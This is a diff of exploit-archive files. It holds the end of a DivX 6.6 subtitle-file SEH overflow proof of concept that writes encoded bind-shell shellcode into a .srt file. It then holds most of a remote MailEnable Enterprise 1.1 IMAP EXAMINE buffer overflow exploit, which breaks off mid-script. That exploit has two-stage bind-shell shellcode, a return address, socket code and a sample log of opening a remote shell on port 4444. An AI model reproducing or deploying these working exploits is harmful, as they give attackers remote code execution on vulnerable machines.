+"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
-"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
+"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
-"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
+"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
-"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
+"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
-"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
+"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
-"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
+"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
-"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
+"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
-"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
+"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
-"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
+"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
-"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
+"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
-"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
+"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
-"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
+"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
-"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
+"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
-"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
+"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
-"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
+"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
-"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
+"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
-"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
+"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
-"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
+"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
-"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
+"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
-"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
+"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
-"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
+"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
-"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
+"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
-"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
+"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
-"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
+"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
-"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
+"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
-"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
+"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
-"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
+"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
-"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
+"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
-"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
+"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
-"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
+"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
-"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
+"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
-"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
+"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
-"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
+"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
-"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
+"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
-"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
+"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
-"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
+"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
-"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
+"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
-"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
+"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
-"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
+"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
-"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
+"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
-"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
+"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
-"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
+"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
-"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
+"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
-"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
+"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
-"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
+"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
-"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
+"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
-"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
+"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
-"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
+"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
-"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
+"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
-"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
+"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
-"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
+"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
-"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
+"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
-"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
+"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
-"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
+"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
-"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
+"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
-"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
+"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
-"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
+"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
-"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
+"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
-"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
+"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
-"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
+"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
-"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
+"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
-"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
+"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
-"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
+"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
-"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
+"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
-"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
+"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
-"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
+"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
-"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
+"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
-"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
+"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
-"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
+"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
-
+
-f=open(file,'w')
+f=open(file,'w')
-f.write("1 \n")
+f.write("1 \n")
-f.write("00:00:01,001 --> 00:00:02,001\n")
+f.write("00:00:01,001 --> 00:00:02,001\n")
-f.write(bindshell)
+f.write(bindshell)
-f.close()                                              
+f.close()                                              
-print "DivX 6.6 SEH SRT Overflow - PoC\n";    
+print "DivX 6.6 SEH SRT Overflow - PoC\n";    
-print "http://www.offensive-security.com/0day/divx66.py.txt\n";    
+print "http://www.offensive-security.com/0day/divx66.py.txt\n";    
-print "SRT has been created - ph33r \n";    
+print "SRT has been created - ph33r \n";    
-
+
-# milw0rm.com [2008-04-18]
+# milw0rm.com [2008-04-18]
--- a/platforms/windows/remote/1378.py
+++ b/platforms/windows/remote/1378.py
@ -1,136 +1,136 @@
-#!/usr/bin/python
+#!/usr/bin/python
-############################################################
+############################################################
-#
+#
-# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
+# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
-# Discovered and exploited by mati@see-security.com
+# Discovered and exploited by mati@see-security.com
-# This vulnerability affects Mailenable Enterprise 1.1
+# This vulnerability affects Mailenable Enterprise 1.1
-# *without* the ME-10009.EXE patch.
+# *without* the ME-10009.EXE patch.
-#
+#
-# Details:
+# Details:
-# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
+# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
-# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
+# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
-# * No space for shellcode, so 1st stage shellcode is used to
+# * No space for shellcode, so 1st stage shellcode is used to
-#   jump back 512 bytes into the bindshell (2nd stage) shellcode.
+#   jump back 512 bytes into the bindshell (2nd stage) shellcode.
-#
+#
-# Thanks:
+# Thanks:
-# * My wife - for putting up with my obesssions
+# * My wife - for putting up with my obesssions
-# * Talz - for helping me out with the 1st stage shellcode
+# * Talz - for helping me out with the 1st stage shellcode
-#
+#
-#		 FOR EDUCATION PURPOSES ONLY!
+#		 FOR EDUCATION PURPOSES ONLY!
-############################################################
+############################################################
-# 1st stage shellcode:
+# 1st stage shellcode:
-############################################################
+############################################################
-# [BITS 32]
+# [BITS 32]
-# 
+# 
-# global _start
+# global _start
-#
+#
-# _start:
+# _start:
-# 
+# 
-# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
+# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
-# 
+# 
-# ;--- copy eip into ecx 
+# ;--- copy eip into ecx 
-# fldz
+# fldz
-# fnstenv [esp-12]
+# fnstenv [esp-12]
-# pop ecx
+# pop ecx
-# add cl, 10
+# add cl, 10
-# nop
+# nop
-# ;----------------------------------------------------------------------
+# ;----------------------------------------------------------------------
-# dec ch      ; ecx=-256;
+# dec ch      ; ecx=-256;
-# dec ch      ; ecx=-256;
+# dec ch      ; ecx=-256;
-# jmp ecx     ; lets jmp ecx (current location - 512)
+# jmp ecx     ; lets jmp ecx (current location - 512)
-############################################################
+############################################################
-# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
+# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
-#
+#
-# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
+# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
-# Discovered / Coded by mati@see-security.com
+# Discovered / Coded by mati@see-security.com
-#
+#
-# [+] Connecting to 192.168.1.160
+# [+] Connecting to 192.168.1.160
-# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
+# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
-# [+] Logging in as ftp
+# [+] Logging in as ftp
-# [+] a001 OK LOGIN completed
+# [+] a001 OK LOGIN completed
-# [+] Sending evil buffer...
+# [+] Sending evil buffer...
-# [+] Done
+# [+] Done
-#
+#
-# [+] Try connecting to port 4444 on victim IP - Muhahaha!
+# [+] Try connecting to port 4444 on victim IP - Muhahaha!
-#
+#
-# root@slax:/tmp# nc -nv 192.168.1.160 4444
+# root@slax:/tmp# nc -nv 192.168.1.160 4444
-# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
+# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
-# Microsoft Windows 2000 [Version 5.00.2195]
+# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
+# (C) Copyright 1985-2000 Microsoft Corp.
-#
+#
-# C:\WINNT\system32>
+# C:\WINNT\system32>
-#####################################################
+#####################################################
-
+
-import sys
+import sys
-import struct
+import struct
-import socket
+import socket
-from time import sleep
+from time import sleep
-
+
-if len(sys.argv)!=5:
+if len(sys.argv)!=5:
-	print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
+	print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
-        print "\nDiscovered / Coded by mati@see-security.com\n"
+        print "\nDiscovered / Coded by mati@see-security.com\n"
-        print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
+        print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
-        sys.exit(0)
+        sys.exit(0)
-
+
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
+
-# Return Address - Win2k SP4 jmp ebx
+# Return Address - Win2k SP4 jmp ebx
-returnaddress = "\x66\x4a\x4e\x7c"
+returnaddress = "\x66\x4a\x4e\x7c"
-
+
-# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
+# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
-# First Stage Shellcode
+# First Stage Shellcode
-
+
-sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
+sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
-sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
+sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
-sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
+sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
-
+
-# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-# Second Stage Shellcode
+# Second Stage Shellcode
-
+
-sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
+sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
-sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
+sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
-sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
+sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
-sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
+sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
-sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
+sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
-sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
+sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
-sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
+sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
-sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
+sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
-sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
+sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
-sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
+sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
-sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
+sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
-sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
+sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
-sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
+sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
-sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
+sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
-sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
+sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
-sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
+sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
-sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
+sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
-sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
+sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
-sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
+sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
-sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
+sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
-sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
+sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
-sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
+sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
-
+
-buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
+buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
-
+
-print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
+print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
-print "Discovered / Coded by mati@see-security.com\n"
+print "Discovered / Coded by mati@see-security.com\n"
-print "[+] Connecting to " + sys.argv[1]
+print "[+] Connecting to " + sys.argv[1]
-try:
+try:
-	s.connect((sys.argv[1],int(sys.argv[2])))
+	s.connect((sys.argv[1],int(sys.argv[2])))
-except:
+except:
-        print "Could not connect to IMAP server!"
+        print "Could not connect to IMAP server!"
-        sys.exit(0)
+        sys.exit(0)
-
+
-data=s.recv(1024)
+data=s.recv(1024)
-print "[+] "+data.rstrip()
+print "[+] "+data.rstrip()
-print "[+] Logging in as %s" % sys.argv[3]
